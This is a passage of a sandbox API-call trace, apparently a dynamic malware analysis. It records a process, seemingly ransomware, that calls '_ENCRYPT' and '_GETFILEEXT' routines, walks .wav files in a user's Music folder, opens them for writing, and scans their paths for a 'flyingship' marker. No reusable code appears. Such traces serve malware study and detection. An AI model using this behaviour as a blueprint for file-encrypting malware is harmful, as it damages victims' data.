lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.246] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0186.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0186.247] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0186.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0186.247] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0186.247] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0186.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0186.247] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0186.247] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0186.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.247] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.247] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.247] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.248] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\S1qr7.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae40630, ftCreationTime.dwHighDateTime=0x1d5dbba, ftLastAccessTime.dwLowDateTime=0xa2987a80, ftLastAccessTime.dwHighDateTime=0x1d5e805, ftLastWriteTime.dwLowDateTime=0xa2987a80, ftLastWriteTime.dwHighDateTime=0x1d5e805, nFileSizeHigh=0x0, nFileSizeLow=0xbbd, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="S1qr7.wav", cAlternateFileName="")) returned 0x90add8 [0186.249] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.249] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.249] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\S1qr7.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae40630, ftCreationTime.dwHighDateTime=0x1d5dbba, ftLastAccessTime.dwLowDateTime=0xa2987a80, ftLastAccessTime.dwHighDateTime=0x1d5e805, ftLastWriteTime.dwLowDateTime=0xa2987a80, ftLastWriteTime.dwHighDateTime=0x1d5e805, nFileSizeHigh=0x0, nFileSizeLow=0xbbd, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="S1qr7.wav", cAlternateFileName="")) returned 0x90add8 [0186.250] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.250] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.250] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.250] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.250] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.250] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.250] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.250] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0186.250] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.250] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0186.250] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.252] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\wwubmhmkz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.252] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.253] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.253] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.253] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0186.253] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.254] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.254] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0186.254] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.254] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0186.254] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.254] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0186.254] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0186.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.254] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.254] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.254] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.254] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe5ec70, ftCreationTime.dwHighDateTime=0x1d5d8d9, ftLastAccessTime.dwLowDateTime=0xa5315d20, ftLastAccessTime.dwHighDateTime=0x1d5e38c, ftLastWriteTime.dwLowDateTime=0xa5315d20, ftLastWriteTime.dwHighDateTime=0x1d5e38c, nFileSizeHigh=0x0, nFileSizeLow=0x8f92, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="WWUbMhmKz.wav", cAlternateFileName="WWUBMH~1.WAV")) returned 0x90add8 [0186.256] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.256] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.256] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe5ec70, ftCreationTime.dwHighDateTime=0x1d5d8d9, ftLastAccessTime.dwLowDateTime=0xa5315d20, ftLastAccessTime.dwHighDateTime=0x1d5e38c, ftLastWriteTime.dwLowDateTime=0xa5315d20, ftLastWriteTime.dwHighDateTime=0x1d5e38c, nFileSizeHigh=0x0, nFileSizeLow=0x8f92, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="WWUbMhmKz.wav", cAlternateFileName="WWUBMH~1.WAV")) returned 0x90add8 [0186.257] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.257] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 